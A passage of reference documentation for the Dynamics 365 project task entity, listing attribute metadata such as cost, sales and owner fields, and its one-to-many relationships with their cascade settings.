[msdyn_plannedcost_Base](#BKMK_msdyn_plannedcost_Base) - [msdyn_plannedsales_Base](#BKMK_msdyn_plannedsales_Base) - [msdyn_projectName](#BKMK_msdyn_projectName) - [msdyn_remainingcost_Base](#BKMK_msdyn_remainingcost_Base) - [msdyn_remainingsales_Base](#BKMK_msdyn_remainingsales_Base) - [msdyn_resourcecategoryName](#BKMK_msdyn_resourcecategoryName) - [msdyn_ResourceOrganizationalUnitIdName](#BKMK_msdyn_ResourceOrganizationalUnitIdName) - [msdyn_SalesConsumptionPercentage](#BKMK_msdyn_SalesConsumptionPercentage) - [msdyn_SalesEstimateAtComplete](#BKMK_msdyn_SalesEstimateAtComplete) - [msdyn_salesestimateatcomplete_Base](#BKMK_msdyn_salesestimateatcomplete_Base) - [msdyn_SalesVariance](#BKMK_msdyn_SalesVariance) - [msdyn_salesvariance_Base](#BKMK_msdyn_salesvariance_Base) - [msdyn_transactioncategoryName](#BKMK_msdyn_transactioncategoryName) - [msdyn_VarianceOfCost](#BKMK_msdyn_VarianceOfCost) - [msdyn_varianceofcost_Base](#BKMK_msdyn_varianceofcost_Base) - [OwnerIdName](#BKMK_OwnerIdName) - [OwnerIdYomiName](#BKMK_OwnerIdYomiName) - [OwningBusinessUnit](#BKMK_OwningBusinessUnit) - [OwningTeam](#BKMK_OwningTeam) - [OwningUser](#BKMK_OwningUser) - [TransactionCurrencyIdName](#BKMK_TransactionCurrencyIdName) - [VersionNumber](#BKMK_VersionNumber) ### <a name="BKMK_CreatedBy"></a> CreatedBy **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier of the user who created the record.| |DisplayName|Created By| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|createdby| |RequiredLevel|None| |Targets|systemuser| |Type|Lookup| ### <a name="BKMK_CreatedByName"></a> CreatedByName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|createdbyname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_CreatedByYomiName"></a> CreatedByYomiName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|createdbyyominame| |MaxLength|100| |RequiredLevel|SystemRequired| |Type|String| ### <a name="BKMK_CreatedOn"></a> CreatedOn |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Date and time when the project task was created.| |DisplayName|Created On| |Format|DateAndTime| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|createdon| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_CreatedOnBehalfBy"></a> CreatedOnBehalfBy **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier of the delegate user who created the record.| |DisplayName|Created By (Delegate)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|createdonbehalfby| |RequiredLevel|None| |Targets|systemuser| |Type|Lookup| ### <a name="BKMK_CreatedOnBehalfByName"></a> CreatedOnBehalfByName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|createdonbehalfbyname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_CreatedOnBehalfByYomiName"></a> CreatedOnBehalfByYomiName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|createdonbehalfbyyominame| |MaxLength|100| |RequiredLevel|SystemRequired| |Type|String| ### <a name="BKMK_ExchangeRate"></a> ExchangeRate **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Shows the exchange rate for the currency associated with the entity with respect to the base currency.| |DisplayName|Exchange Rate| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|exchangerate| |MaxValue|100000000000| |MinValue|0.0000000001| |Precision|10| |RequiredLevel|None| |Type|Decimal| ### <a name="BKMK_ModifiedBy"></a> ModifiedBy **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier of user who last modified the record.| |DisplayName|Modified By| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|modifiedby| |RequiredLevel|None| |Targets|systemuser| |Type|Lookup| ### <a name="BKMK_ModifiedByName"></a> ModifiedByName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|modifiedbyname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_ModifiedByYomiName"></a> ModifiedByYomiName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|modifiedbyyominame| |MaxLength|100| |RequiredLevel|SystemRequired| |Type|String| ### <a name="BKMK_ModifiedOn"></a> ModifiedOn |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Date and time when the record was modified.| |DisplayName|Modified On| |Format|DateAndTime| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|modifiedon| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_ModifiedOnBehalfBy"></a> ModifiedOnBehalfBy **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier of the delegate user who modified the record.| |DisplayName|Modified By (Delegate)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|modifiedonbehalfby| |RequiredLevel|None| |Targets|systemuser| |Type|Lookup| ### <a name="BKMK_ModifiedOnBehalfByName"></a> ModifiedOnBehalfByName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|modifiedonbehalfbyname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_ModifiedOnBehalfByYomiName"></a> ModifiedOnBehalfByYomiName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|modifiedonbehalfbyyominame| |MaxLength|100| |RequiredLevel|SystemRequired| |Type|String| ### <a name="BKMK_msdyn_actualcost_Base"></a> msdyn_actualcost_Base |Property|Value| |--------|-----| |Description|Value of the Actual Cost in base currency.| |DisplayName|Actual Cost (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualcost_base| |MaxValue|922337203685477| |MinValue|0| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_actualsales_Base"></a> msdyn_actualsales_Base |Property|Value| |--------|-----| |Description|Shows the value of the actual sales in the base currency.| |DisplayName|Actual Sales (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualsales_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_AssignedTeamMembersName"></a> msdyn_AssignedTeamMembersName |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|msdyn_assignedteammembersname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_CostAtCompleteEstimate"></a> msdyn_CostAtCompleteEstimate |Property|Value| |--------|-----| |Description|Enter the forecast of the total cost to complete the task.| |DisplayName|Cost estimate at complete (EAC)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_costatcompleteestimate| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_costatcompleteestimate_Base"></a> msdyn_costatcompleteestimate_Base |Property|Value| |--------|-----| |Description|Value of the Cost estimate at complete (EAC) in base currency.| |DisplayName|Cost estimate at completion (EAC) (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_costatcompleteestimate_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_CostConsumptionPercentage"></a> msdyn_CostConsumptionPercentage |Property|Value| |--------|-----| |Description|Enter the consumption of the total cost in percentage.| |DisplayName|Cost Consumption %| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_costconsumptionpercentage| |MaxValue|100000000000| |MinValue|-100000000000| |Precision|2| |RequiredLevel|None| |Type|Decimal| ### <a name="BKMK_msdyn_parenttaskName"></a> msdyn_parenttaskName |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|msdyn_parenttaskname| |MaxLength|450| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_plannedcost_Base"></a> msdyn_plannedcost_Base |Property|Value| |--------|-----| |Description|Enter the value of cost estimated in base currency.| |DisplayName|Estimated cost| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_plannedcost_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_plannedsales_Base"></a> msdyn_plannedsales_Base |Property|Value| |--------|-----| |Description|Shows the value of the planned sales in the base currency.| |DisplayName|Planned Sales (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_plannedsales_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_projectName"></a> msdyn_projectName |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|msdyn_projectname| |MaxLength|200| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_remainingcost_Base"></a> msdyn_remainingcost_Base |Property|Value| |--------|-----| |Description|Shows the value of the remaining cost in the base currency.| |DisplayName|Remaining Cost (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_remainingcost_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_remainingsales_Base"></a> msdyn_remainingsales_Base |Property|Value| |--------|-----| |Description|Shows the value of the remaining sales in the base currency.| |DisplayName|Remaining Sales (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_remainingsales_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_resourcecategoryName"></a> msdyn_resourcecategoryName |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|msdyn_resourcecategoryname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_ResourceOrganizationalUnitIdName"></a> msdyn_ResourceOrganizationalUnitIdName |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|msdyn_resourceorganizationalunitidname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_SalesConsumptionPercentage"></a> msdyn_SalesConsumptionPercentage |Property|Value| |--------|-----| |Description|Shows the sales consumption percentage for this task.| |DisplayName|Sales Consumption %| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_salesconsumptionpercentage| |MaxValue|100000000000| |MinValue|-100000000000| |Precision|2| |RequiredLevel|None| |Type|Decimal| ### <a name="BKMK_msdyn_SalesEstimateAtComplete"></a> msdyn_SalesEstimateAtComplete |Property|Value| |--------|-----| |Description|Shows the sales estimate at the completion of this task.| |DisplayName|Sales Estimate At Complete (EAC)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_salesestimateatcomplete| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_salesestimateatcomplete_Base"></a> msdyn_salesestimateatcomplete_Base |Property|Value| |--------|-----| |Description|Value of the Sales Estimate At Complete (EAC) in base currency.| |DisplayName|Sales Estimate At Complete (EAC) (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_salesestimateatcomplete_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_SalesVariance"></a> msdyn_SalesVariance |Property|Value| |--------|-----| |Description|Shows the sales variance for this task.| |DisplayName|Sales Variance| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_salesvariance| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_salesvariance_Base"></a> msdyn_salesvariance_Base |Property|Value| |--------|-----| |Description|Shows the value of the sales variance in the base currency.| |DisplayName|Sales Variance (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_salesvariance_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_transactioncategoryName"></a> msdyn_transactioncategoryName |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|msdyn_transactioncategoryname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_VarianceOfCost"></a> msdyn_VarianceOfCost |Property|Value| |--------|-----| |Description|Enter the variance between the estimated cost and the forecasted cost based on the estimate at completion (EAC).| |DisplayName|Cost Variance| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_varianceofcost| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_varianceofcost_Base"></a> msdyn_varianceofcost_Base |Property|Value| |--------|-----| |Description|Shows the value of the cost variance in the base currency.| |DisplayName|Cost Variance (Base)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_varianceofcost_base| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|2| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_OwnerIdName"></a> OwnerIdName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Name of the owner| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|owneridname| |MaxLength|100| |RequiredLevel|SystemRequired| |Type|String| ### <a name="BKMK_OwnerIdYomiName"></a> OwnerIdYomiName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Yomi name of the owner| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|owneridyominame| |MaxLength|100| |RequiredLevel|SystemRequired| |Type|String| ### <a name="BKMK_OwningBusinessUnit"></a> OwningBusinessUnit **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier for the business unit that owns the record| |DisplayName|Owning Business Unit| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|owningbusinessunit| |RequiredLevel|None| |Targets|businessunit| |Type|Lookup| ### <a name="BKMK_OwningTeam"></a> OwningTeam **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier for the team that owns the record.| |DisplayName|Owning Team| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|owningteam| |RequiredLevel|None| |Targets|team| |Type|Lookup| ### <a name="BKMK_OwningUser"></a> OwningUser **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier for the user that owns the record.| |DisplayName|Owning User| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|owninguser| |RequiredLevel|None| |Targets|systemuser| |Type|Lookup| ### <a name="BKMK_TransactionCurrencyIdName"></a> TransactionCurrencyIdName **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|| |DisplayName|| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|transactioncurrencyidname| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_VersionNumber"></a> VersionNumber **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Version Number| |DisplayName|Version Number| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|versionnumber| |MaxValue|9223372036854775807| |MinValue|-9223372036854775808| |RequiredLevel|None| |Type|BigInt| <a name="onetomany"></a> ## One-To-Many Relationships Listed by **SchemaName**. - [msdyn_projecttask_SyncErrors](#BKMK_msdyn_projecttask_SyncErrors) - [msdyn_projecttask_DuplicateMatchingRecord](#BKMK_msdyn_projecttask_DuplicateMatchingRecord) - [msdyn_projecttask_DuplicateBaseRecord](#BKMK_msdyn_projecttask_DuplicateBaseRecord) - [msdyn_projecttask_AsyncOperations](#BKMK_msdyn_projecttask_AsyncOperations) - [msdyn_projecttask_MailboxTrackingFolders](#BKMK_msdyn_projecttask_MailboxTrackingFolders) - [msdyn_projecttask_ProcessSession](#BKMK_msdyn_projecttask_ProcessSession) - [msdyn_projecttask_BulkDeleteFailures](#BKMK_msdyn_projecttask_BulkDeleteFailures) - [msdyn_projecttask_PrincipalObjectAttributeAccesses](#BKMK_msdyn_projecttask_PrincipalObjectAttributeAccesses) - [msdyn_projecttask_QueueItems](#BKMK_msdyn_projecttask_QueueItems) - [msdyn_projecttask_Annotations](#BKMK_msdyn_projecttask_Annotations) - [msdyn_msdyn_projecttask_msdyn_actual_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_actual_Task) - [msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask](#BKMK_msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask) - [msdyn_msdyn_projecttask_msdyn_estimateline_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_estimateline_Task) - [msdyn_msdyn_projecttask_msdyn_fact_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_fact_Task) - [msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_invoicelinetransaction_Task) - [msdyn_msdyn_projecttask_msdyn_journalline_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_journalline_Task) - [msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_opportunitylinetransaction_Task) - [msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_orderlinetransaction_Task) - [msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask](#BKMK_msdyn_msdyn_projecttask_msdyn_projectapproval_ProjectTask) - [msdyn_msdyn_projecttask_msdyn_projecttask_parenttask](#BKMK_msdyn_msdyn_projecttask_msdyn_projecttask_parenttask) - [msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask](#BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskdependency_PredecessorTask) - [msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask](#BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskdependency_SuccessorTask) - [msdyn_msdyn_projecttask_msdyn_projecttaskstatususer](#BKMK_msdyn_msdyn_projecttask_msdyn_projecttaskstatususer) - [msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask](#BKMK_msdyn_msdyn_projecttask_msdyn_quotelinescheduleofvalue_projecttask) - [msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task](#BKMK_msdyn_msdyn_projecttask_msdyn_quotelinetransaction_Task) - [msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid](#BKMK_msdyn_msdyn_projecttask_msdyn_resourceassignment_taskid) - [msdyn_msdyn_projecttask_msdyn_timeentry_projectTask](#BKMK_msdyn_msdyn_projecttask_msdyn_timeentry_projectTask) ### <a name="BKMK_msdyn_projecttask_SyncErrors"></a> msdyn_projecttask_SyncErrors **Added by**: System Solution Solution Same as syncerror entity [msdyn_projecttask_SyncErrors](syncerror.md#BKMK_msdyn_projecttask_SyncErrors) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|syncerror| |ReferencingAttribute|regardingobjectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_SyncErrors| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_DuplicateMatchingRecord"></a> msdyn_projecttask_DuplicateMatchingRecord **Added by**: System Solution Solution Same as duplicaterecord entity [msdyn_projecttask_DuplicateMatchingRecord](duplicaterecord.md#BKMK_msdyn_projecttask_DuplicateMatchingRecord) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|duplicaterecord| |ReferencingAttribute|duplicaterecordid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_DuplicateMatchingRecord| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_DuplicateBaseRecord"></a> msdyn_projecttask_DuplicateBaseRecord **Added by**: System Solution Solution Same as duplicaterecord entity [msdyn_projecttask_DuplicateBaseRecord](duplicaterecord.md#BKMK_msdyn_projecttask_DuplicateBaseRecord) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|duplicaterecord| |ReferencingAttribute|baserecordid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_DuplicateBaseRecord| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_AsyncOperations"></a> msdyn_projecttask_AsyncOperations **Added by**: System Solution Solution Same as asyncoperation entity [msdyn_projecttask_AsyncOperations](asyncoperation.md#BKMK_msdyn_projecttask_AsyncOperations) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|asyncoperation| |ReferencingAttribute|regardingobjectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_AsyncOperations| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: NoCascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_MailboxTrackingFolders"></a> msdyn_projecttask_MailboxTrackingFolders **Added by**: System Solution Solution Same as mailboxtrackingfolder entity [msdyn_projecttask_MailboxTrackingFolders](mailboxtrackingfolder.md#BKMK_msdyn_projecttask_MailboxTrackingFolders) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|mailboxtrackingfolder| |ReferencingAttribute|regardingobjectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_MailboxTrackingFolders| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_ProcessSession"></a> msdyn_projecttask_ProcessSession **Added by**: System Solution Solution Same as processsession entity [msdyn_projecttask_ProcessSession](processsession.md#BKMK_msdyn_projecttask_ProcessSession) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|processsession| |ReferencingAttribute|regardingobjectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_ProcessSession| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: NoCascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_BulkDeleteFailures"></a> msdyn_projecttask_BulkDeleteFailures **Added by**: System Solution Solution Same as bulkdeletefailure entity [msdyn_projecttask_BulkDeleteFailures](bulkdeletefailure.md#BKMK_msdyn_projecttask_BulkDeleteFailures) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|bulkdeletefailure| |ReferencingAttribute|regardingobjectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_BulkDeleteFailures| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_PrincipalObjectAttributeAccesses"></a> msdyn_projecttask_PrincipalObjectAttributeAccesses **Added by**: System Solution Solution Same as principalobjectattributeaccess entity [msdyn_projecttask_PrincipalObjectAttributeAccesses](principalobjectattributeaccess.md#BKMK_msdyn_projecttask_PrincipalObjectAttributeAccesses) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|principalobjectattributeaccess| |ReferencingAttribute|objectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_PrincipalObjectAttributeAccesses| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_QueueItems"></a> msdyn_projecttask_QueueItems **Added by**: System Solution Solution Same as queueitem entity [msdyn_projecttask_QueueItems](queueitem.md#BKMK_msdyn_projecttask_QueueItems) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|queueitem| |ReferencingAttribute|objectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_QueueItems| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: NoCascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_projecttask_Annotations"></a> msdyn_projecttask_Annotations **Added by**: System Solution Solution Same as annotation entity [msdyn_projecttask_Annotations](annotation.md#BKMK_msdyn_projecttask_Annotations) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|annotation| |ReferencingAttribute|objectid| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_projecttask_Annotations| |AssociatedMenuConfiguration|Behavior: DoNotDisplay<br />Group: Details<br />Label: <br />Order: | |CascadeConfiguration|Assign: Cascade<br />Delete: Cascade<br />Merge: NoCascade<br />Reparent: Cascade<br />Share: Cascade<br />Unshare: Cascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_actual_Task"></a> msdyn_msdyn_projecttask_msdyn_actual_Task Same as msdyn_actual entity [msdyn_msdyn_projecttask_msdyn_actual_Task](msdyn_actual.md#BKMK_msdyn_msdyn_projecttask_msdyn_actual_Task) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_actual| |ReferencingAttribute|msdyn_task| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_actual_Task| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: Restrict<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: NoCascade<br />Unshare: NoCascade| ### <a name="BKMK_msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask"></a> msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask Same as msdyn_contractlinescheduleofvalue entity [msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask](msdyn_contractlinescheduleofvalue.md#BKMK_msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask) Many-To-One relationship. |Property|Value| |--------|-----| |ReferencingEntity|msdyn_contractlinescheduleofvalue| |ReferencingAttribute|msdyn_projecttask| |IsHierarchical|False| |IsCustomizable|True| |ReferencedEntityNavigationPropertyName|msdyn_msdyn_projecttask_msdyn_contractlinescheduleofvalue_projecttask| |AssociatedMenuConfiguration|Behavior: UseCollectionName<br />Group: Details<br />Label: <br />Order: 10000| |CascadeConfiguration|Assign: NoCascade<br />Delete: Restrict<br />Merge: NoCascade<br />Reparent: NoCascade<br />Share: 